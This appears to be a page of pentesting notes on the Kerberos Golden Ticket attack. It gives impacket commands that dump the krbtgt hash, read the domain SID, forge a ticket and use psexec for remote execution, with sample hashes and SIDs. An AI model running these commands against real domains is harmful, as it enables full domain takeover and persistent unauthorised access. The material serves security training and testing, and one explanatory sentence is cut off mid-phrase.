Golden Ticket

Complete Domain Compromise with a Golden Ticket AttackNetwrix Blog | Insights for Cybersecurity and IT Pros

Using mimikatz

Mimikatz | CheatSheet Pentesting

Using impacket tools

Golden Ticket Attack Explained - MITRE ATT&CK T1558.001Picus Security

Extract the krbtgt NTLM hash

secretsdump.py Administrator:<PASSWORD>@10.10.100.200

[...]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5508500012cc005cf7082a9a89ebdfdf:::
[...]

Extract SID of Domain

lookupsid.py CONTROLLER.local/Administrator:<PASSWORD>@10.10.100.200

[...]
[*] Domain SID is: S-1-5-21-849420856-2351964222-986696166
[...]

Generating Golden Ticket

Using the krbtgt NTLM hash, the Domain SID, the Domain Name and a

ticketer.py -nthash "5508500012cc005cf7082a9a89ebdfdf" -domain-sid "S-1-5-21-849420856-2351964222-986696166" -domain "CONTROLLER.local" NonExistentUserBla

Using ticket

export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py CONTROLLER.local/Administrator@10.10.100.212 -k -no-pass

PreviousASREP-Roast VS Kerberoasting NextResource Based Constrained Delegation

Last updated 8 months ago